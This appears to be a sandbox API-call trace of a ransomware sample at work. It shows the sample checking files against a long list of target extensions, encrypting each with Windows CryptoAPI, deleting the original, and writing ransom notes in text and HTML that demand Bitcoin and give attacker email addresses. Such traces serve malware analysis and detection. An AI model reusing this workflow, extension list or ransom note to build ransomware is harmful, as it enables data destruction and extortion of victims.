	[0199.982] lstrcmpW (lpString1="ytSeHq8iA1PZ-.swf", lpString2=".") returned 1
	[0199.982] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\"
	[0199.982] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\", lpString2="ytSeHq8iA1PZ-.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\ytSeHq8iA1PZ-.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\ytSeHq8iA1PZ-.swf"
	[0199.982] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\ytSeHq8iA1PZ-.swf") returned 86
	[0199.982] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.983] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\ytSeHq8iA1PZ-.swf", cchLength=0x56 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf") returned 0x56
	[0199.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.983] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0199.983] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf"
	[0199.983] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf") returned 86
	[0199.983] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.984] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.984] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0199.984] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.984] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0199.984] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.985] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.985] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0199.989] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x48fe, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x48fe, lpOverlapped=0x0) returned 1
	[0199.992] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.992] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb000) returned 1
	[0199.994] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.994] CryptCreateHash (in: hProv=0xfcb000, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0199.995] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.995] CryptHashData (hHash=0xfb92b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0199.995] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.995] CryptDeriveKey (in: hProv=0xfcb000, Algid=0x6610, hBaseData=0xfb92b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb8f70) returned 1
	[0199.995] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.995] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x48fe, dwBufLen=0x48fe | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x4900) returned 1
	[0199.996] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.996] RtlMoveMemory (in: Destination=0xfe1a88, Source=0xfdd180, Length=0x48fe | out: Destination=0xfe1a88) 
	[0199.997] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.997] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe1a88*, pdwDataLen=0x18a1ec*=0x48fe, dwBufLen=0x4900 | out: pbData=0xfe1a88*, pdwDataLen=0x18a1ec*=0x4900) returned 1
	[0199.997] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.997] CryptDestroyKey (hKey=0xfb8f70) returned 1
	[0199.997] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.998] CryptDestroyHash (hHash=0xfb92b0) returned 1
	[0199.998] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.998] CryptReleaseContext (hProv=0xfcb000, dwFlags=0x0) returned 1
	[0199.998] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.998] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.999] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.999] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0200.000] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 128
	[0200.000] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0200.031] WriteFile (in: hFile=0x390, lpBuffer=0xfe1a88*, nNumberOfBytesToWrite=0x4900, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe1a88*, lpNumberOfBytesWritten=0x18a648*=0x4900, lpOverlapped=0x0) returned 1
	[0200.035] CloseHandle (hObject=0x390) returned 1
	[0200.035] CloseHandle (hObject=0x388) returned 1
	[0200.036] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf")) returned 1
	[0200.039] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ytsehq8ia1pz-.swf")) returned 0
	[0200.039] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c1bdf10, ftCreationTime.dwHighDateTime=0x1d975fb, ftLastAccessTime.dwLowDateTime=0xd7b6ca0, ftLastAccessTime.dwHighDateTime=0x1d97664, ftLastWriteTime.dwLowDateTime=0xd7b6ca0, ftLastWriteTime.dwHighDateTime=0x1d97664, nFileSizeHigh=0x0, nFileSizeLow=0x48fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="ytSeHq8iA1PZ-.swf", cAlternateFileName="YTSEHQ~1.SWF")) returned 0
	[0200.039] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0200.040] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0200.040] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT"
	[0200.040] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\*.*"
	[0200.040] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.041] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0200.041] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\HELP_DECRYPT_YOUR_FILES.TXT") returned 96
	[0200.041] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0200.042] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0200.042] WriteFile (in: hFile=0x2c0, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0200.044] CloseHandle (hObject=0x2c0) returned 1
	[0200.044] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.045] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0200.046] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0200.046] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0200.047] SetFilePointer (in: hFile=0x2c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0200.047] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0200.047] WriteFile (in: hFile=0x2c0, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0200.047] CloseHandle (hObject=0x2c0) returned 1
	[0200.047] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.048] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0200.048] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0200.049] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\HELP_DECRYPT_YOUR_FILES.HTML") returned 97
	[0200.049] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0200.049] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0200.049] WriteFile (in: hFile=0x2c0, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0200.052] CloseHandle (hObject=0x2c0) returned 1
	[0200.052] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.053] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.053] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
